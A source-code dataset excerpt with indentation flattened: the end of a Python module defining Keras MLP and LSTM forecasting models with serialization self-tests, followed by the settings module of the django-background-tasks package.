df[self.mOutName + '_residue'] = target - df[self.mOutName].values
return df;
class cMLP_Model(cAbstract_RNN_Model):
gTemplateModels = {};
def __init__(self , cycle_residue_name, P , iExogenousInfo = None):
super().__init__(cycle_residue_name, P, iExogenousInfo)
def build_RNN_Architecture(self):
lModel = None;
if(self.mNbLags not in cMLP_Model.gTemplateModels.keys()):
lModel = self.build_RNN_Architecture_template();
cMLP_Model.gTemplateModels[self.mNbLags] = lModel;
import copy;
self.mModel = copy.copy(cMLP_Model.gTemplateModels[self.mNbLags]);
self.mModel.reset_states();
# print(cMLP_Model.gTemplateModels[self.mNbLags].__dict__);
# print(self.mModel.__dict__);
self.mFormula = "MLP(" + str(self.mNbLags) + ")";
self.mOutName = self.mCycleResidueName + '_MLP(' + str(self.mNbLags) + ")";
def __getstate__(self):
dict_out = self.__dict__.copy();
dict_out["mModel"] = self.mModel.to_json();
# print("GET_STATE_LSTM", dict_out);
return dict_out;
def __setstate__(self, istate):
# print("LSTM_SET_STATE" , istate);
from keras.models import model_from_json
self.__dict__ = istate.copy();
self.mModel = model_from_json(istate["mModel"]);
def build_RNN_Architecture_template(self):
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import LSTM
# import theano
# print(theano.config)
lModel = Sequential()
lModel.add(Dense(self.mHiddenUnits, input_shape=(1, self.mNbLags)))
lModel.add(Dropout(0.1))
lModel.add(Dense(1))
lModel.compile(loss='mse', optimizer='adam')
return lModel;
def reshape_target(self, iTarget):
return np.reshape(iTarget, (iTarget.shape[0], 1, 1))
class cLSTM_Model(cAbstract_RNN_Model):
gTemplateModels = {};
def __init__(self , cycle_residue_name, P , iExogenousInfo = None):
super().__init__(cycle_residue_name, P, iExogenousInfo)
def build_RNN_Architecture(self):
lModel = None;
if(self.mNbLags not in cLSTM_Model.gTemplateModels.keys()):
lModel = self.build_RNN_Architecture_template();
cLSTM_Model.gTemplateModels[self.mNbLags] = lModel;
import copy;
self.mModel = copy.copy(cLSTM_Model.gTemplateModels[self.mNbLags]);
self.mModel.reset_states();
# print(cLSTM_Model.gTemplateModels[self.mNbLags].__dict__);
# print(self.mModel.__dict__);
self.mFormula = "LSTM(" + str(self.mNbLags) + ")";
self.mOutName = self.mCycleResidueName + '_LSTM(' + str(self.mNbLags) + ")";
def build_RNN_Architecture_template(self):
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import LSTM
# import theano
# theano.config.reoptimize_unpickled_function = False
# theano.config.cxx = ""
lModel = Sequential()
lModel.add(LSTM(self.mHiddenUnits, input_shape=(1, self.mNbLags)))
lModel.add(Dropout(0.1))
lModel.add(Dense(1))
lModel.compile(loss='mse', optimizer='adam')
return lModel;
def testPickle_old(self):
import pickle
out1 = pickle.dumps(self.mModel);
lModel2 = pickle.loads(out1);
out2 = pickle.dumps(lModel2);
print(sorted(self.mModel.__dict__))
print(sorted(lModel2.__dict__))
for (k , v) in self.mModel.__dict__.items():
print(k , self.mModel.__dict__[k])
print(k , lModel2.__dict__[k])
assert(out1 == out2)
print("TEST_PICKLE_OLD_OK")
def testPickle(self):
import dill
dill.settings['recurse'] = False
out1 = dill.dumps(self.mModel);
lModel2 = dill.loads(out1);
out2 = dill.dumps(lModel2);
print(sorted(self.mModel.__dict__))
print(sorted(lModel2.__dict__))
for (k , v) in self.mModel.__dict__.items():
print(k , self.mModel.__dict__[k])
print(k , lModel2.__dict__[k])
assert(out1 == out2)
print("TEST_PICKLE_OK")
def __getstate__(self):
dict_out = self.__dict__.copy();
dict_out["mModel"] = self.mModel.to_json();
# print("GET_STATE_LSTM", dict_out);
return dict_out;
def __setstate__(self, istate):
# print("LSTM_SET_STATE" , istate);
from keras.models import model_from_json
self.__dict__ = istate.copy();
self.mModel = model_from_json(istate["mModel"]);
def reshape_target(self, iTarget):
return iTarget
|
background_task/settings.py
|
radomirvrana/django-background-tasks
| 586 |
129719
|
<reponame>radomirvrana/django-background-tasks
# -*- coding: utf-8 -*-
import multiprocessing
from django.conf import settings
try:
cpu_count = multiprocessing.cpu_count()
except Exception:
cpu_count = 1
class AppSettings(object):
"""
"""
@property
def MAX_ATTEMPTS(self):
"""Control how many times a task will be attempted."""
return getattr(settings, 'MAX_ATTEMPTS', 25)
@property
def BACKGROUND_TASK_MAX_ATTEMPTS(self):
"""Control how many times a task will be attempted."""
return self.MAX_ATTEMPTS
@property
def MAX_RUN_TIME(self):
"""Maximum possible task run time, after which tasks will be unlocked and tried again."""
return getattr(settings, 'MAX_RUN_TIME', 3600)
@property
def BACKGROUND_TASK_MAX_RUN_TIME(self):
"""Maximum possible task run time, after which tasks will be unlocked and tried again."""
return self.MAX_RUN_TIME
@property
def BACKGROUND_TASK_RUN_ASYNC(self):
"""Control if tasks will run asynchronous in a ThreadPool."""
return getattr(settings, 'BACKGROUND_TASK_RUN_ASYNC', False)
@property
def BACKGROUND_TASK_ASYNC_THREADS(self):
"""Specify number of concurrent threads."""
return getattr(settings, 'BACKGROUND_TASK_ASYNC_THREADS', cpu_count)
@property
def BACKGROUND_TASK_PRIORITY_ORDERING(self):
"""
Control the ordering of tasks in the queue.
Choose either `DESC` or `ASC`.
https://en.m.wikipedia.org/wiki/Nice_(Unix)
A niceness of −20 is the highest priority and 19 is the lowest priority. The default niceness for processes is inherited from its parent process and is usually 0.
"""
order = getattr(settings, 'BACKGROUND_TASK_PRIORITY_ORDERING', 'DESC')
if order == 'ASC':
prefix = ''
else:
prefix = '-'
return prefix
app_settings = AppSettings()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.